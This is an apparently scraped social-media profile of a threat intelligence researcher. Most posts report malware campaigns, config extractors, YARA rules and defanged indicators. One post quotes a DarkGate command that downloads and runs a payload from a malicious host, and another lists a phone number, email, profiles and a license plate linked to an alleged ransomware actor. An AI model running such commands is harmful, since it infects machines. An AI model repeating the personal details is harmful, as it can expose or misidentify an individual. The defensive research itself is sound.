RussianPanda 🐼 🇺🇦 Profile Banner
RussianPanda 🐼 🇺🇦 Profile
RussianPanda 🐼 🇺🇦

@RussianPanda9xx

Followers
10,076
Following
395
Media
783
Statuses
4,051

Senior Threat Intelligence Researcher at @esthreat | Threat Hunter | Malware Addict

Grand Rapids, MI
Joined September 2021
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
4 months
Deanon is claiming to have the original version of Pegasus that works on all versions of Android and iOS. The pricing for the lifetime access is $ 1,500,000 👀 A few days later, Deanon offered the subscription model for Pegasus Panel. Around April 10, Apple started sending email
Tweet media one
Tweet media two
21
111
650
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Hunting for APTs at the park 😎
Tweet media one
18
34
473
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
#Pikabot execution chain: ➡️ rundll32.exe <PikaBot_payload>.dll,Test (initial execution) ➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39) ➡️ whoami.exe /all ➡️ ipconfig.exe /all ➡️ schtasks.exe /Create /F /TN
Tweet media one
7
94
353
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
When a SOC analyst closes the true positive alert as false positive ☠️
@Malwarebytes
Malwarebytes
1 year
IT admins after half the company clicked the phishing link.
37
250
1K
32
47
309
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
6 months
I have a high level of confidence that the RAT they are talking about in the iSoon leak is #ShadowPad , the successor of PlugX, which is used by APT41 (leak: ) C2: 118.31.3[.]116 References:
Tweet media one
5
90
317
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
So, here is my attempt to analyze the new stealer on the block - #MeduzaStealer . The writeup comes with a config extractor 🐍 It is likely that the developers behind Meduza Stealer are also responsible for #AuroraStealer .
Tweet media one
22
82
258
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
7 months
#100DaysofYara Day 6: This rule detects TrueCrypt, which is the crypter written in Golang and is used by many well-known stealer families, such as Raccoon Stealer, Vidar, MetaStealer, Redline, and Lumma stealers. Let's make our rules more confusing for malware developers 😉
Tweet media one
7
51
251
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
9 months
I wrote the #PikaBot C2 extractor script. Since I am terrible at Regex, I found Yara pattern matching much more merciful 😅 You can access the C2 extractor here:
Tweet media one
4
48
254
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
4 months
Another great showcase of using @urlscanio . You can use Options to specify the HTTP referer and user agent. Let's apply this to the threat case that @DaveLikesMalwre found today. We were able to extract the main culprit (chatgpt-app.]cloud) from the injected script that is
Tweet media one
Tweet media two
8
44
223
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Wrote a #DarkGate configuration extractor. Doesn't cost 15k per month 🥲
Tweet media one
9
36
220
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Check out my latest analysis on #WhiteSnakeStealer with them config extractors 🐍 I know, the image does not represent the white snake, but a shoutout to @0xToxin for generating it for me 🤗
Tweet media one
18
64
213
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
7 months
This was my first attempt at dissecting MacOS malware with barely any knowledge about how MacOS works, but I certainly learned a lot. I present you the blog on #AtomicStealer or From Russia With Code: Disarming Atomic Stealer
Tweet media one
5
42
202
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
10 months
The new #Nitrogen 2.0 campaign comes back with some juicy stuff...🤿 ✅ AMSI, WLDP bypass, ETW patching, AntiHook, and the implementation of KrakenMask ✅ Usage of transacted hollowing ✅ Obfuscated Python scripts delivering Sliver C2 and Cobalt Strike payloads ✅ Usage of
Tweet media one
5
55
193
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
6 months
New #PlanetStealer written in Golang. What do we know so far? 🔒 It's UPX-packed. Simple XOR string encryption. Sends POST requests to C2 server: 193.178.170[.]30 (can anyone find a login link?) 😅 with exfiltrated data: ✅ /submit/info - sends the initial information,
Tweet media one
6
39
200
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
I’m telling you, I’m a panda 🐼 👀
Tweet media one
25
1
196
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
26 days
🚨 Breaking News! 📷 #ANYRUN sandbox now offers #Windows10 x64 VM to free users. You can detonate, analyze, and interact with malware in a modern OS. Sign up and start your first analysis 📷… I have been using ANYRUN a lot lately, not going to lie ☺️
12
49
192
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
9 months
Checkout my writeup on #MetaStealer 👾 It's not to be confused with #RedlineStealer ! Big thanks to @cod3nym for the review!
Tweet media one
11
69
188
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
How I reverse malware … Disclaimer: don’t try this at home.
9
13
181
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
1/ You might have noticed that my area of interest is specifically stealers and RATs 😅 Wrote the configuration extractor for #Vidar stealer
Tweet media one
4
52
179
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
4 months
I can't emphasize enough how invaluable @urlscanio has been in identifying additional domains related to #FIN7 . The effort would not have been possible without the support of the community and the contributions of people who submit those domains to the platform.
Tweet media one
14
26
179
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 month
Do people actually read long technical blogs with myriad lines of codes and 5 paragraphs of explanations 🤔 I feel like my writeups are getting shorter and shorter … just because from my personal experience, I don’t read everything in a 10-15 pages article and I usually scroll
44
7
173
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
The report on the campaign I proudly named "Resident" is finally out 🔥 We have been tracking it since December 2022 across multiple EDR products - Carbon Black, SentinelOne and CrowdStrike @esthreat
8
61
168
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
I am naming this #RogueRaticate campaign that leverages URL shortcuts to drop #NetSupportRAT 🐀 1/ ➡️ The user is getting infected via a drive-by download with the fake update screen (similar to SocGholish behavior). The initial payload is hosted on compromised WordPress
Tweet media one
Tweet media two
Tweet media three
Tweet media four
7
57
163
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
Thank you everyone for your support and very helpful tips. I think the presentation went well. 🥹
Tweet media one
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
We are presenting at #RSAC first thing in the morning tomorrow… I am terrified of public speaking, feeling very anxious, mostly because of the imposter syndrome, I think? Hopefully, will get some sleep tonight 😀
21
1
96
12
3
162
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
9 months
Check out my writeup on #ParallaxRAT 🐀 infection leading to lateral movement And, of course, not without the configuration extractor: @esthreat
Tweet media one
7
50
164
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
An interesting bundle that: ➡️ Drops Xen Manager password recovery ➡️ Drops Golang password extractor () ➡️ Drops XMRig ➡️ Exfiltrates credentials over an FTP channel ➡️ FTP: ftp.hpdataserver.altervista[.]org (lots of stolen credentials 💀) ➡️ Another
2
42
157
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 years
1/ #QuasarRAT 🐀 was observed being delivered via #OneNote . Shoutout to @dr4k0nia for helping me with deobfuscating the "injector" ✏️ and showing me some .NET dark arts. C2: ghcc.duckdns[.]org:4782 Extracted configuration:
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
46
158
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
It’s time to replace you, IDA. One step at a time 🥷 @psifertex My opsec is lit, I know.
Tweet media one
21
8
155
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Potential #ducktail #infostealer . The binary is a mess. Has ngrok embedded in and .NET dependencies (I believe, for credentials stealing). It collects Brave, Edge, Chrome, and Firefox browsing data, takes the screenshot of the user machine, and saves it under %temp% folder with
Tweet media one
3
35
148
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
5 months
#XStealer , shame on you for selling someone's project under your name. Simply changing the name doesn't change the origin or ownership of the work. It's actually a clone of #NemesisProject , a source code that was up for sale back in 2021.
Tweet media one
Tweet media two
Tweet media three
Tweet media four
16
24
146
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
5 months
Time to add #GlorySprout stealer to the list of shame. Check out my analysis on GlorySprout Stealer, or should I say Taurus Stealer? 🤔
Tweet media one
7
50
147
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
29. What a scary number 🫣 But I will be forever 18 regardless 😂
Tweet media one
39
0
142
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
The recent intrusion from #SocGholish infection we have observed at @esthreat If you see your email signatures are being replaced by: ✅ file://170.130.55[.]72/logocompany.jpeg ✅ file://170.130.55[.]72/main_logo.png Please isolate the host immediately 🚨 Article:
Tweet media one
4
47
136
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
Ice Ice Baby 🧊 #DanaBot dropping IcedID? Check out my writeup on the recent #IcedID sample we saw at @esthreat
Tweet media one
4
35
136
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
Found #PureLogs Stealer under the Christmas tree this year 🎄 Here is my attempt to unwrap it (detection rules included):
Tweet media one
3
46
137
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Configuration extractor for #RaccoonStealer v2. 🦝
Tweet media one
2
34
134
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
It is nothing new, but I just figured it would be handy to have a config extractor for #RemcosRAT somewhere 😅 🐀
Tweet media one
5
37
132
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
Alright, with all the #ONNX Phishing-as-a-Service hype today, if this post gets 10 likes, I will reveal the name of the person behind it. Not asking for a million dollar 😂
@WhichbufferArda
Arda Büyükkaya
2 months
The Caffeine Phishing-as-a-Service (PhaaS) platform has undergone rebranding and is now known as ONNX Store. Key details include: - Targeting Method: Cybercriminals use the service to send PDF attachments with embedded QR codes to financial institutions. - Phishing Mechanism:
Tweet media one
Tweet media two
14
69
318
5
17
132
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 month
My happiness ❤️🐶
Tweet media one
16
0
127
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
24 days
I had so much “fun” looking into this case 😅 Dubbed the dropper as #Gh0stGambit 🐀 deploying #Gh0stRAT Link:
Tweet media one
7
29
126
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Wrote a config extractor for #QuasarRAT Inspired by @herrcore stream 😅
Tweet media one
2
30
123
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
IDAPython string decryption script for #RaccoonStealer . Tested on the latest build 2.1.0-4. I know, my Python is really ugly 😂
Tweet media one
3
34
116
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
#Redline Stealer delivered via likely a drive-by download. Executed via .msix file (Chat-GPT-x64.msix). The file contains the malicious PowerShell script that reaches out to adv-pardorudy[.]ru to pull the Redline Stealer and load it as an assembly into memory. Redline C2:
Tweet media one
Tweet media two
7
25
122
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 years
1/ #socgholish deploying #NetSupportRAT at the first stage. The threat actor(s) deployed a PowerShell script via the NetSupport session after 2 days. Thanks @dr4k0nia for a reversing session, she found the next stage to be #asyncrat 🐀
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
42
121
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
28. Getting old 😭
Tweet media one
37
0
122
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
Wedding ready 👰🏻‍♀️💒
Tweet media one
Tweet media two
15
0
120
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
Potentially related. Phone numbers: 79518535470 IPs: 95.32.242.124, 176.59.64.64 Email: horoshev7 @gmail [.com VK: https://vk.]com/id95447714 (deleted) VK: https://vk.]com/id58582822 (old) VK: https://vk.]com/id59986572 (old) Possible license plate: О570ЕТ136
Tweet media one
@Jon__DiMaggio
Jon DiMaggio
3 months
RANSOMWARE DIARIES 5 is out! Want to know more about Dmitry…I mean #LockBit ?! 😹I have a LOT more intel and now so do you!
Tweet media one
22
112
371
7
14
119
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
11 months
More #DarkGate shenanigans cd /d %temp% & curl -o Autoit3.exe http://thebesttime[.]buzz:8080 & curl -o spcsln.au3 http://thebesttime[.]buzz:8080/msiqvxfwlqj & Autoit3.exe spcsln.au3 C2: hxxp://thebesttime[.]buzz | hxxp://whereistime[.]buzz Potential post-infection C2:
4
29
118
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
6 months
Happy Lunar New Year! 🧧 Chúc mừng năm mới 🐉
Tweet media one
Tweet media two
8
0
116
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
7 months
Just another .NET stealer 🥱
Tweet media one
@FalconFeedsio
FalconFeeds.io
7 months
We have discovered a new stealer called 'Sentinel Stealer.' Its features include browser, communication, crypto, games, FTP/SSH, Discord injection, wallet injection, etc #sentinelstealer #malware #stealer
Tweet media one
Tweet media two
Tweet media three
1
22
71
3
18
112
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
We have observed the campaign that we named #Nitrogen . It leverages DLL side-loading to execute the malicious payload. Currently, I am working on the full write-up with my colleague @jgajek 🔥
Tweet media one
2
31
115
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Wrote a configuration extractor for #AuroraStealer Maybe Golang is not that bad 😜
Tweet media one
2
20
112
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
#100DaysofYara Day 2: This one will be on #JinxLoader (Golang); the new version comes in Golang, and the previous ones were based on .NET. Hopefully, will do a full write-up on this loader soon 🥹
Tweet media one
3
25
114
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
Just before 2024, I am releasing another blog addressing the new #MetaStealer version, talking about some stealer's drama, and I also included something on the Google cookie refresher "feature" ... Happy New Year, folks! 🎇
Tweet media one
8
39
114
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
Entering 2024 strongly with #100DaysOfYARA . Day 1: my first Yara rule for this year will be the updated rule on newer samples of #MeduzaStealer
Tweet media one
0
22
114
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
#LummaC2 🪽 config extractor for build and C2:
Tweet media one
Tweet media two
Tweet media three
2
31
108
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
16 days
Donut Loader 🍩 is still being used by many threat actors to deliver nasty RATs. Check out the latest writeup which involves one infection leading to four malware 👾 I just wanted four rats in my art, oh well ... Link:
Tweet media one
3
32
106
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
6 months
When I see Rust malware packed with VMProtect, I suddenly face an existential crisis...
8
7
104
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
5 months
Spent a day looking for Easter eggs in malware land... 😭 #tiredme
Tweet media one
10
0
102
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Wrote a "quick" configuration extractor for #DynamicRAT mentioned here Config extractor: More payloads found based on the Yara rule: Happy Friday! 🌻
Tweet media one
@Gi7w0rm
Gi7w0rm
1 year
New #BlogPost : It seems @tosscoinwitcher and I have discovered a previously undocumented #Java -based #RAT . Dupped #DynamicRAT , the #malware has a vast array of features. Read all about it the discovery process here: #CyberSecurity #infosec #networktamper
Tweet media one
Tweet media two
Tweet media three
11
50
163
3
26
98
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
#AuroraStealer has a new March 2023 update (the first one this year). ➡️ Added FTP (for FileZilla only) and RDP grabbers ➡️ New grabber functionality (ability to choose file extensions) ➡️ The attackers are able to change the ports now, so no more default 8081 :( ➡️ Ports to
Tweet media one
Tweet media two
Tweet media three
4
36
103
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
Panda is unavailable, she is too busy … 🔞
Tweet media one
6
3
101
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
Nothing is worse than analyzing a malware developed by Chinese folks. Like, can you just make it easier a little and less confusing? I have lost track on following the chain of persistence 😂 I was analyzing a sample that I thought was a rat but it was just a rat dropper, but
5
2
101
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
5 months
Imagine being an idiot and a malware developer / threat actor at the same time 🤷🏻‍♀️
20
9
98
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
We have been observing #BatLoader 🦇 using batch files to: ➡️ Install Python 3.9.9 ➡️ Use pip to install pywin32 and wmi packages. ➡️ Unpack the compressed OpenSSL library files using PowerShell ➡️ Launching Python scripts obfuscated with PyArmor
Tweet media one
Tweet media two
1
37
99
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 month
Happy Independence Day 🇺🇸
Tweet media one
13
1
100
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
Highlight of the SF trip 🌉
Tweet media one
5
0
101
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
My little write-up on #D3fackLoader , the lovely MaaS loader from our boy Sergei. Preparing another blog on it, stay tuned 👀 Article: @esthreat
Tweet media one
4
27
100
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
15 days
It doesn't matter if your payload is FUD or how hard you try to blur out the payload you uploaded to VT. I will still find you and detect you, #D3FackLoader [' https://steamcommunity[.]com/profiles/76561199689894251', '\\21[.]txt', '\\21[.]cmd', '\\85[.]zip', '\\855[.]zip',
Tweet media one
Tweet media two
7
8
100
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
An interesting RAT written in JS. ✅ Receives server's response and decrypts it with RC4 ✅ Executes the decrypted command with "eval" ✅ Sends POST requests to the C2 in an encrypted form (RC4 + Base64)
Tweet media one
Tweet media two
@naumovax
Ksenia \n
3 months
Unknown #RAT was found on the C2: 110.34.30[.]9:6600 👻 note: this IP with another port is Cobalt Strike Server
Tweet media one
Tweet media two
4
5
41
2
29
96
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
I want to make it clear once and for all. I don’t have anything against Russian people. There are no bad nations, there are only bad people. I talk to some Russian folks and they are perfectly fine. I was born and raised in Ukraine, yes. Why do I have the RussianPanda handle? It
Tweet media one
19
2
97
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
Merry Christmas 🎄
Tweet media one
9
0
100
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
10 months
#SolarMarker has switched to using Inno Setup to package the encrypted .NET payload. You can use any Inno Setup unpacker to extract it, for example, Innounp: Created a quick script to decrypt the .NET payload. In our example, the XOR key is
Tweet media one
@SquiblydooBlog
Squiblydoo
10 months
First stage has recently changed. I may need a new blogpost. Low Detection #SolarMarker #Signed #EV ТОВ "Софт Енжін юа" C2: 146.70.71.135 C2: 91.206.178.109 VT: MB: Backdoor: @JAMESWT_MHT @luke92881
4
15
45
4
26
97
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 month
I am sponsoring 3 people for the CTF this Saturday hosted by awesome folks at @TheDFIRReport ! 🤩 I definitely recommend trying it out, there are only a few blue team CTFs out there but this one is next level 💙 All you need to do is follow me, like the post and put a comment
@TheDFIRReport
The DFIR Report
2 months
🚀DFIR Labs CTF🚀 Our next CTF will be July 6, 16:00 – 20:00 UTC. ➡️Only $9.99 to join! ➡️Choose Elastic or Splunk as your SIEM ➡️Join our DFIR Labs CTF Discord Server ➡️Top 3 players win free swag! Register: More info:
4
29
81
20
21
96
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
3 months
We are presenting at #RSAC first thing in the morning tomorrow… I am terrified of public speaking, feeling very anxious, mostly because of the imposter syndrome, I think? Hopefully, will get some sleep tonight 😀
21
1
96
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
6 months
Excited to announce that I will be speaking at #RSA Conference 2024 with my colleague Spence (he does exist). Come see us in May 🥹💕
Tweet media one
15
3
96
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
4 months
Unraveling Not AZORult but Koi Loader: A Precursor to Koi Stealer Did some analysis on #KoiLoader which ultimately led to #KoiStealer . Warning ⚠️It is not AZORult. The blog: @esthreat
Tweet media one
8
35
95
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
7 months
New short writeup on #WorkersDevBackdoor . The backdoor was also previously spotted by @0xBurgers @esthreat
Tweet media one
5
31
91
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 years
Wrote an #AsyncRAT 🐀 config extractor using DotNetPE based on @dr4k0nia sample 😝
Tweet media one
@dr4k0nia
dr4k0nia
2 years
#CTI #AsyncRAT C2: xe3x1.ath[.]cx C2: xonxen.dnsalias[.]com Port: 6666 SHA256: 76f655949c39dfd591636997afae0a090c9ac51f8972e862a092eba574f517e9 Pretty much a vanilla sample no obfuscation or additions.
Tweet media one
4
7
32
2
29
91
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
Some #SolarMarker fun. They changed the DLL payload delivery slightly. Hopefully, it stays the same for a little bit. ▶️C2: 78.135.73[.]180 ▶️Version: JL-4 Here is the DLL payload extractor for the recent version:
Tweet media one
5
23
87
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
I am very proud to be born and raised in Kharkiv, the first capital of Ukraine 🇺🇦 We had a great Vietnamese community in my city before the war, but now most of us escaped to Europe or went back to Vietnam. It is very heartbreaking to see that most of us would want to come back
@shaunwalker7
Shaun Walker
2 months
On Ukraine's Vietnamese minority, many of whom have stayed during the war and some of whom are fighting. The community has a decades-long history (Vietnam's richest person made his first money in Kharkiv in the 1990s...)
22
553
2K
11
7
92
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
6 months
Extracted C2 domains for #LummaC2 (infected vibrator case 101 🦠): gemcreedarticulateod[.]shop/api secretionsuitcasenioise[.]shop/api claimconcessionrebe[.]shop/api liabilityarrangemenyit[.]shop/api modestessayevenmilwek[.]shop/api triangleseasonbenchwj[.]shop/api
@vxunderground
vx-underground
6 months
Sitting here wondering if we should approach this person, requesting to purchase the used sex toy, to inspect it for malware 🤔🤔🤔🤔🤔
31
29
442
4
17
91
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
9 months
I want this for Christmas 🥹
@snyff
Louis Nyffenegger
9 months
Christmas gift for your blue team friends
Tweet media one
25
221
1K
8
12
89
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
11 months
Nice try of #MillenuimRAT copy-pasting the open-source RAT #ToxicEye and selling it for $15 ...
Tweet media one
7
10
88
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
Checkout my writeup on #PhantomControl delivering #AndeLoader and #SwaetRAT via ScreenConnect. And no, I didn’t misspell SwaetRAT 🤭 @esthreat
Tweet media one
3
23
86
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 years
I think I have a new favorite tool 😍 #malcat @malcat4ever
Tweet media one
Tweet media two
Tweet media three
3
11
87
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
It’s out 🐀
Tweet media one
@FalconFeedsio
FalconFeeds.io
1 year
Strontium stealer group names their new Remote Access Trojan as "LithiumRat". The group has also shared some screenshots of the command and control panel. #stealer #malware
Tweet media one
Tweet media two
Tweet media three
0
6
13
2
21
84
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
2 months
Two days spent into trying to figure out why the decryption script breaks for probably something that I might never look at again but nothing is worse than the feeling of moving on and not being able to figure it out ...
Tweet media one
12
5
83
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
8 months
My colleague Spence and I conducted research on #Batloader and #FakeBat . We hope our findings assist the community in distinguishing between these two malware families. It's also our hope to prevent the emergence of numerous names for the same malware family. We avoided naming
Tweet media one
4
24
86
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
4 months
Just want to express my appreciation to the team at @TheDFIRReport for their dedication to putting this together. I'm not sure if I enjoyed the struggle of squinting my eyes out looking through thousands of logs, but it is real, and if you plan to be a defender and handle
Tweet media one
Tweet media two
3
6
84
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
29 days
Семки есть? А если найду? 👀
Tweet media one
21
0
84
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
15 days
🌴🍺
Tweet media one
13
1
86
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
@SophosXOps You guys are a month late, welcome to the campaign I named, and no credits were given 🥲
Tweet media one
Tweet media two
@RussianPanda9xx
RussianPanda 🐼 🇺🇦
1 year
We have observed the campaign that we named #Nitrogen . It leverages DLL side-loading to execute the malicious payload. Currently, I am working on the full write-up with my colleague @jgajek 🔥
Tweet media one
2
31
115
7
21
81